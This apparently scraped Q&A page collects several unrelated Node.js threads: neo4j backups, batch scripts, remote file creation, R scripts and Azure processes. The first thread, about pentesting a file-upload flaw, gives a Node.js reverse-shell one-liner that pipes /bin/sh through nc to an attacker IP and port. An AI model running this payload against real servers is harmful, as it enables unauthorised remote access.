i'm trying to learn NodeJS pentesting process i have a found a remote file upload vulnerability in a Nodejs website ,can i upload a remote shell in NodeJS , like we do in PHP or ASPX and execute command ? can i upload a NodeJS shell.js and execute unix command in the server from this shell ?
Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).
It's possible only if you can "EXECUTE" the file.
But if you can "execute" JavaScript code you could create a reverse shell using this:
(function () {
require("child_process")
.exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
Otherwise if you can't execute the file then you only will see the content of the file:
https://myvulnerablewebsite.com/hack.js
Related
I have a ReactJS-neo4j application, deployed on a cloud server. Currently, i create backups of my databases manually.
Now I want to automate this process. I want to automatically execute the above query every day
Can anyone tell me how to automate the above process ?
You need to change your neo4j configuration file found in <HOME_neo4j>/conf/neo4j.conf as below. The location of the file is different if you are not using Linux server, like Debian.
apoc.export.file.enabled=true
apoc.import.file.use_neo4j_config=false
The 2nd line will enable you to save the json file from default folder "import" to any folder you want.
Then open a terminal (or ssh) that connects to your cloud server. Go to <HOME_neo4j> directory where cypher-shell is installed. Copy and run this one liner script below.
echo "CALL apoc.export.json.all(\"/home/backups/deploymentName/backup_mydeployment.json\", { useTypes: true } )" | bin/cypher-shell -u neo4j -p <awesome_psw> --format plain
This will save the json file in /home/backups/deploymentName just like what you do in your neo4j browser.
I will leave it up to you on 1) how to add the timestamp YYMMDD0000_ in the filename via linux command and 2) schedule the job every midnight via crontab. Goodluck!
I am trying to use a batch file to call a node script. The node script exists on a server which is password protected. How do I both call the node script and include the credentials for the path in the same batch file?
Script looks like this
CLS
#ECHO OFF
node "\\[server_name]\d$\[path_name]\GetDynamicTeams.js"
if NOT %ERRORLEVEL% == 0 (
pause
)
I have tried running the net use syntax and included the user/pass but to no avail. That looked like this
node net use "\\devwn12281\d$\xMattersSystems\scripts\xMatters Toolbox\GetDynamicTeams.js" /USER:alarmpoint xm2215x99=
Syntax wouldn't work because I can't include node keyword in that command.
Any ideas?
What is the easiest way to create a file on a remote server (can be accessed with ssh) in NodeJS?
Example: I work on my local computer, and there exists a remote server with ip 192.168.1.100. I would like to create an empty text file on this server, in path "/home/users/share".
I tried using some scp library in NodeJS, but could not copy my file to the remoted server.
What do you mean?
If file is created in path, that ssh has access, and rights are set OK, then file be acceseable.
Do you want to generate data on the server and save it?
https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback
Choose a file from the disk and upload it to the server? eg: https://www.w3schools.com/nodejs/nodejs_uploadfiles.asp
If I am correct, you want to create file on different server using Nodejs and want to access the file using ssh.
If your server has linux then you can use rsync command from terminal.
E.g rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file.
And if you want it done from Nodejs then you can use child_process library to execute all terminal commands.
const { exec } = require('child_process');
exec('rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file', (err, () =>
if (err) {
// node couldn't execute the command
return;
}
}));
I am trying to build a node js app in which i call rscript to do some statistical computation and return an array with 8 elements which then i pass back to nodejs so that we can display those elements on ejs pages .
I am successfully able to do this on local host everything is working fine and even rscript is running and giving back the output, but when we try to do the same on ubuntu server we are not getiing any console.log(out) on our terminal (out is the variable which gets the output from the rscript) we get a null.
We are calling the script in localhost and server in same way as shown.
`console.log(data);
var out = rscript(abc.R)
.data(data.xyz,data.abc)
.callSync();
console.log(out);`
In the above code we get json in the data variable and it gives log as well both on local and server.
I have installed all the libraries needed like rscirpt inside nodejs using npm and have already installed R and Rstudio on my ubuntu server and installed all the libraries too which are needed to run the rscript.
The rscript is placed in same folder where my index.js is alll the ejs pages are stored in other folder which the node app is able to access and display them too.
You will have to deploy your R script somewhere else and then call that R script using API calls in your node server file.
One of the services that you can use to call rscript as an API in node is Algorithmia. You will just need to follow their instructions and wrap all your code inside a function. It will appear as a sample there, once you create an R project.
i'm trying to run a simple executable using an Azure Web Role.
The executable is stored in the Web Role's local storage.
The executable produces a log.txt file once it has been run.
This is the method I am using to run the executable:
public void RunExecutable(string path)
{
Process.Start(path);
}
Where path is localStorage.RootPath + "Application.exe"
The problem I am facing is that when I open the local storage folder the executable is there however there is no log.txt file.
I have tested the executable, it works if I manually run it, it produces the log.txt file.
Can anyone see the problem?
Try setting an explicit WorkingDirectory for the process... I wonder if log.txt is being created, just not where you expect. (Or perhaps the app is trying to create log.txt but failing because of the permissions on the directory it's trying to create it in.)
If you remote desktop into the instance, can't you find the file created at E:\approot\ folder ? As Steve said, using a WorkingDirectory for the process will fix the issue
You can use Environment.GetEnvironmentVariable("RoleRoot") to construct the URL to your application root